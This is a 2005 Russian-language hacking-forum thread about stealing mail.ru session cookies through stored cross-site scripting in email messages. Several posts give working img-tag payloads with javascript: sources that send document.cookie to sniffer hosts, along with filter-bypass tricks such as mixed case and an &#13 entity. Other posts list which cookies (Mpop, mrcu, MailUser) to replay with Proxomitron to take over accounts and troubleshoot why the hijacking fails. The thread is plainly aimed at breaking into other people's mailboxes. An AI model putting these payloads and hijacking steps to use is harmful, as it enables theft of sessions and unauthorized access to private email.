опять mail.ru

Discussion in 'Уязвимости Mail-сервисов' started by san40, 31 Jan 2005.

  1. san40

    san40 New Member

    Joined:
    31 Jan 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста каким образом можно получить куки на сниффер??? и как их заюзать(например Proxomitron)
     
  2. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    если ты упоминаешь Proximitron, то наверное обращался к статьям Скальпеля. Тогда что еще нужно, там же все расписано поэтапно, да и видео снято
     
  3. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    А че - дыру на chat.mail.ru не залатали??????????
     
  4. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    Залатали, но можно сразу через почту

    <image src="JaVaScRiPt:document.images[x].src='http://sniffer?'+document.cookie">
    вот так где-то
     
    #4 JazzzSummerMan, 1 Feb 2005
    Last edited: 1 Feb 2005
  5. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    Точно так или как нибуть по другому?
     
  6. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    Ввел: <image
    src="javascript:document.images[x].src='http://antichat.ru/cgi-bin/s.jpg?'+docum
    ent.cookie">
    и отправил к себе на 2 ящик, открыл сообщение но в снифере не чего не увидил!
    Я прошу вас - скажите, очень надо и уже не ради прикола...
     
  7. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    Так он фильтрует конешно javascript

    А так нет :
    HTML:
    <image name=img width=1 height=1 src=javascript&#13:document.img.src="http://www.adres/snifer.php?"+document.cookie;>
     
    #7 Майор, 3 Feb 2005
    Last edited: 3 Feb 2005
  8. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    я написал JaVaScRiPt в разных регистрах, но здесь почему-то в нижний переводится. Вобщем можно как у меня, только в разных регистрах, и вместо x номер картинки
     
  9. san40

    san40 New Member

    Joined:
    31 Jan 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    А как тогда заюзать куки??? Если юзать их в прокомитроне то вроде надо брать то чо начинается со слова mpop ???? И все %20 урать вроде надо,да?
     
  10. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    Подделовать надо токо :
    mrcu
    p
    MailUser
    t
    Mpop
    Mpop

    Остальные можно просто удалить
    ты вообще вкурсе что такое эти "%20" ?
     
  11. san40

    san40 New Member

    Joined:
    31 Jan 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    да вкурсе это %20 это пробел. Хорошо куки я подделал Захожу на пагу маил.ру вижу пароль уже стоит нажимаю вход а меня не пускает,пишет мол типа не тот пас,может уже защита какаянить стоит??
     
  12. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    Не работает...
    Вставляю в сообщение :
    <image name=img width=1 height=1 src=javascript&#13:document.img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;>
    И опять не чего в снифере не вижу!
     
  13. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    Токо что проверил в IE - пашет, в mozile врятли работать будет
     
  14. YooogI

    YooogI NoMoneyNoWork

    Joined:
    3 Feb 2005
    Messages:
    98
    Likes Received:
    3
    Reputations:
    0
    и у меня все ок!
     
  15. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    А может я чегонибуть тогда не правильно делаю...
    Вставляю я этот код в поле "Письмо".
    И отсылаю без темы или стемой - пробывал и так и так.
     
  16. san40

    san40 New Member

    Joined:
    31 Jan 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    <image
    src="javasCriPt:document.images[1].src='http://sniff.ru/sniff.php?'+docum
    ent.cookie"> Это пашет 100% только почемуто поделать куки у меня не получилось :( вроде полученное вставил в Проксомитрон поставил вместо %20 пробелы, открываю Маил.ру вижу логин и пас уже стоят нажимаю вход а меня выкидывает на страницу авторизации..... никто не знает вчем дело??
     
  17. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
  18. san40

    san40 New Member

    Joined:
    31 Jan 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    По этой ссылки поле с паролем пустое :(
     
  19. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    с помошью какой проги ты это делаешь ?
     
  20. san40

    san40 New Member

    Joined:
    31 Jan 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Proxomitron